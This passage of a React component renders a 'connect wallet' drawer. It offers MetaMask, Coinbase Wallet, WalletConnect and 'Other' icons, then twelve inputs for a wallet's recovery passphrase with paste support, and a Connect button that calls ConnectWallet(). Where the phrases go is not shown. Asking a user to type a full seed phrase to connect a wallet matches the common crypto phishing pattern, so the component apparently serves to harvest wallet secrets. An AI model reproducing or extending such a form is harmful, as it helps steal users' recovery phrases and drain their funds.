                                <path d="M11.5981 23.9249L12.0103 20.4916L9.38895 20.5666L11.5981 23.9249Z" fill="#CC6228" stroke="#CC6228" stroke-width="0.25" stroke-linecap="round" stroke-linejoin="round"/>
                                <path d="M19.9896 20.4916L20.3935 23.9249L22.6109 20.5666L19.9896 20.4916Z" fill="#CC6228" stroke="#CC6228" stroke-width="0.25" stroke-linecap="round" stroke-linejoin="round"/>
                                <path d="M21.9761 16.7083L17.2776 16.9249L17.7144 19.3666L18.4069 17.8916L20.0803 18.6666L21.9761 16.7083Z" fill="#CC6228" stroke="#CC6228" stroke-width="0.25" stroke-linecap="round" stroke-linejoin="round"/>
                                <path d="M11.9278 18.6666L13.5929 17.8916L14.2854 19.3666L14.7222 16.9249L10.0236 16.7083L11.9278 18.6666Z" fill="#CC6228" stroke="#CC6228" stroke-width="0.25" stroke-linecap="round" stroke-linejoin="round"/>
                                <path d="M10.0238 16.7083L11.9939 20.6L11.9279 18.6666L10.0238 16.7083Z" fill="#E27525" stroke="#E27525" stroke-width="0.25" stroke-linecap="round" stroke-linejoin="round"/>
                                <path d="M20.0804 18.6666L20.0062 20.6L21.9763 16.7083L20.0804 18.6666Z" fill="#E27525" stroke="#E27525" stroke-width="0.25" stroke-linecap="round" stroke-linejoin="round"/>
                                <path d="M14.7225 16.9249L14.2856 19.3666L14.8378 22.2499L14.9615 18.4499L14.7225 16.9249Z" fill="#E27525" stroke="#E27525" stroke-width="0.25" stroke-linecap="round" stroke-linejoin="round"/>
                                <path d="M17.2777 16.9249L17.0469 18.4417L17.1623 22.2499L17.7146 19.3666L17.2777 16.9249Z" fill="#E27525" stroke="#E27525" stroke-width="0.25" stroke-linecap="round" stroke-linejoin="round"/>
                                <path d="M17.7146 19.3667L17.1623 22.25L17.558 22.5333L20.0062 20.6L20.0804 18.6667L17.7146 19.3667Z" fill="#F5841F" stroke="#F5841F" stroke-width="0.25" stroke-linecap="round" stroke-linejoin="round"/>
                                <path d="M11.9278 18.6667L11.9938 20.6L14.442 22.5333L14.8377 22.25L14.2854 19.3667L11.9278 18.6667Z" fill="#F5841F" stroke="#F5841F" stroke-width="0.25" stroke-linecap="round" stroke-linejoin="round"/>
                                <path d="M17.7641 25.1917L17.7887 24.4L17.5745 24.2166H14.4256L14.2195 24.4L14.236 25.1917L11.5982 23.925L12.5214 24.6916L14.3926 26H17.5992L19.4786 24.6916L20.3936 23.925L17.7641 25.1917Z" fill="#C0AC9D" stroke="#C0AC9D" stroke-width="0.25" stroke-linecap="round" stroke-linejoin="round"/>
                                <path d="M17.5579 22.5333L17.1622 22.25H14.8377L14.442 22.5333L14.2194 24.4L14.4255 24.2166H17.5744L17.7888 24.4L17.5579 22.5333Z" fill="#161616" stroke="#161616" stroke-width="0.25" stroke-linecap="round" stroke-linejoin="round"/>
                                <path d="M25.966 12.6583L26.6667 9.20833L25.6115 6L17.558 12.0417L20.6574 14.6916L25.0345 15.9833L25.999 14.8417L25.5786 14.5333L26.2462 13.9167L25.7352 13.5167L26.4029 13L25.966 12.6583Z" fill="#763E1A" stroke="#763E1A" stroke-width="0.25" stroke-linecap="round" stroke-linejoin="round"/>
                                <path d="M5.33333 9.20833L6.04224 12.6583L5.58887 13L6.26481 13.5167L5.75373 13.9167L6.42143 14.5333L6.00102 14.8417L6.96548 15.9833L11.3426 14.6916L14.442 12.0417L6.38846 6L5.33333 9.20833Z" fill="#763E1A" stroke="#763E1A" stroke-width="0.25" stroke-linecap="round" stroke-linejoin="round"/>
                                <path d="M25.0345 15.9833L20.6574 14.6916L21.9763 16.7083L20.0062 20.5999L22.6111 20.5666H26.5018L25.0345 15.9833Z" fill="#F5841F" stroke="#F5841F" stroke-width="0.25" stroke-linecap="round" stroke-linejoin="round"/>
                                <path d="M11.3425 14.6916L6.9654 15.9833L5.50636 20.5666H9.3889L11.9937 20.5999L10.0236 16.7083L11.3425 14.6916Z" fill="#F5841F" stroke="#F5841F" stroke-width="0.25" stroke-linecap="round" stroke-linejoin="round"/>
                                <path d="M17.2776 16.925L17.5579 12.0416L18.8273 8.56666H13.1725L14.442 12.0416L14.7222 16.925L14.8294 18.4583L14.8376 22.25H17.1622L17.1705 18.4583L17.2776 16.925Z" fill="#F5841F" stroke="#F5841F" stroke-width="0.25" stroke-linecap="round" stroke-linejoin="round"/>
                            </svg>
                            </span>
                            MetaMask
                        </div>
                        <div className={`${styles.type} ${walletType === 'CoinBase Wallet'? styles.active :''}`} onClick={()=> setWalletType("CoinBase Wallet")}>
                            <span className={styles.icon}>
                            <svg width="32" height="32" viewBox="0 0 32 32" fill="none" xmlns="http://www.w3.org/2000/svg">
                                <circle cx="16" cy="16" r="16" fill="#0052FF"/>
                                <path d="M16.02 21.3333C13.0678 21.3333 10.6767 18.9467 10.6767 16C10.6767 13.0533 13.0678 10.6667 16.02 10.6667C18.665 10.6667 20.8602 12.5911 21.2832 15.1111H26.6667C26.2125 9.63556 21.6216 5.33333 16.02 5.33333C10.1201 5.33333 5.33333 10.1111 5.33333 16C5.33333 21.8889 10.1201 26.6667 16.02 26.6667C21.6216 26.6667 26.2125 22.3644 26.6667 16.8889H21.2788C20.8558 19.4089 18.665 21.3333 16.02 21.3333Z" fill="white"/>
                            </svg>
                            </span>
                            CoinBase Wallet
                        </div>
                        <div className={`${styles.type} ${walletType === 'WalletConnect'? styles.active :''}`} onClick={()=> setWalletType("WalletConnect")}>
                            <span className={styles.icon}>
                            <svg width="32" height="32" viewBox="0 0 32 32" fill="none" xmlns="http://www.w3.org/2000/svg">
                                <circle cx="16" cy="16" r="16" fill="#3B99FC"/>
                                <path fill-rule="evenodd" clip-rule="evenodd" d="M22.2993 11.9384C18.8203 8.46497 13.1797 8.46497 9.7007 11.9384L9.24114 12.3973C9.06719 12.5709 9.06719 12.8525 9.24114 13.0262L10.6734 14.4562C10.7604 14.5431 10.9014 14.5431 10.9884 14.4562L11.6055 13.8402C14.0325 11.417 17.9675 11.417 20.3946 13.8402L20.9707 14.4154C21.0577 14.5023 21.1987 14.5023 21.2857 14.4154L22.718 12.9854C22.892 12.8117 22.892 12.5301 22.718 12.3565L22.2993 11.9384ZM26.5362 16.1686L25.2614 14.8959C25.0875 14.7222 24.8055 14.7222 24.6315 14.8959L20.552 18.9689C20.5085 19.0123 20.438 19.0123 20.3945 18.9689L16.3149 14.8958L16.3149 14.8958C16.1409 14.7221 15.8589 14.7221 15.685 14.8958L11.6056 18.9689C11.5621 19.0123 11.4916 19.0123 11.4481 18.9689L7.36848 14.8958C7.19453 14.7221 6.9125 14.7221 6.73855 14.8958L5.46379 16.1685C5.28984 16.3422 5.28984 16.6238 5.46379 16.7974L11.2119 22.5364C11.3859 22.7101 11.6679 22.7101 11.8418 22.5364L15.9213 18.4634C15.9648 18.4199 16.0353 18.4199 16.0788 18.4634L20.1583 22.5364C20.3323 22.7101 20.6143 22.7101 20.7882 22.5364L26.5362 16.7975C26.7101 16.6238 26.7101 16.3423 26.5362 16.1686Z" fill="white"/>
                            </svg>
                            </span>
                            WalletConnect
                        </div>
                        <div className={`${styles.type} ${walletType === 'Other'? styles.active :''}`} onClick={()=> setWalletType("Other")}>
                            <span className={styles.icon}>
                            <svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" viewBox="0 0 24 24"><path fill="var(--font-mine)" d="m11.953 8.819-.547 2.19c.619.154 2.529.784 2.838-.456.322-1.291-1.673-1.579-2.291-1.734zm-.822 3.296-.603 2.415c.743.185 3.037.921 3.376-.441.355-1.422-2.029-1.789-2.773-1.974z"></path><path fill="var(--font-mine)" d="M14.421 2.299C9.064.964 3.641 4.224 2.306 9.581.97 14.936 4.23 20.361 9.583 21.697c5.357 1.335 10.783-1.924 12.117-7.281 1.336-5.356-1.924-10.781-7.279-12.117zm1.991 8.275c-.145.974-.686 1.445-1.402 1.611.985.512 1.485 1.298 1.009 2.661-.592 1.691-1.998 1.834-3.87 1.48l-.454 1.82-1.096-.273.447-1.794a44.624 44.624 0 0 1-.875-.228l-.449 1.804-1.095-.275.454-1.823c-.257-.066-.517-.136-.782-.202L6.87 15l.546-1.256s.808.215.797.199c.311.077.448-.125.502-.261l.719-2.875.115.029a.864.864 0 0 0-.114-.037l.512-2.053c.013-.234-.066-.528-.511-.639.018-.011-.797-.198-.797-.198l.291-1.172 1.514.378-.001.005c.227.057.461.111.7.165l.449-1.802 1.097.273-.44 1.766c.294.067.591.135.879.207l.438-1.755 1.097.273-.449 1.802c1.384.479 2.396 1.195 2.198 2.525z"></path></svg>
                            </span>
                            {t("Other")}
                        </div>
                        </div>
                        <div className={styles.words_inputs}>
                        <span>{t('Passphrases')}</span>
                        {[...Array(4)].map((_, rowIndex) => (
                        <div className={styles.three_inputs} key={rowIndex}>
                        {[...Array(3)].map((_, colIndex) => {
                            const index = rowIndex * 3 + colIndex;
                            return (
                            <input
                                key={index}
                                placeholder={`${index + 1}.`}
                                value={passphrases[index]}
                                onChange={(e) => handleInputChange(index, e.target.value)}
                                onPaste={(e) => handlePaste(e, index)}
                                className={styles.passphrase_input}
                                // Дополнительные атрибуты для улучшения UX
                                autoComplete="off"
                                autoCorrect="off"
                                spellCheck="false"
                                ref={(el) => (inputRefs.current[index] = el)}
                            />
                            );
                        })}
                        </div>
                    ))}
                    
                        </div>
                    </div>
                    }
                </div>
                    {
                    secureLocalStorage?.getItem("user")?.WalletValidation && !editConnectWallet?
                    null:
                    <div className={styles.drawer_footer}>
                        <div onClick={toggleDrawerWallet(false)}>{t("Cancel")}</div>
                        <button
                        onClick={() => {
                            toggleDrawer(false)();
                            ConnectWallet();
                        }}
                        >
                        {t("Connect")}
                        </button>
                    </div>
                    }
                </div>
            </Drawer>
        </div>
    )
}
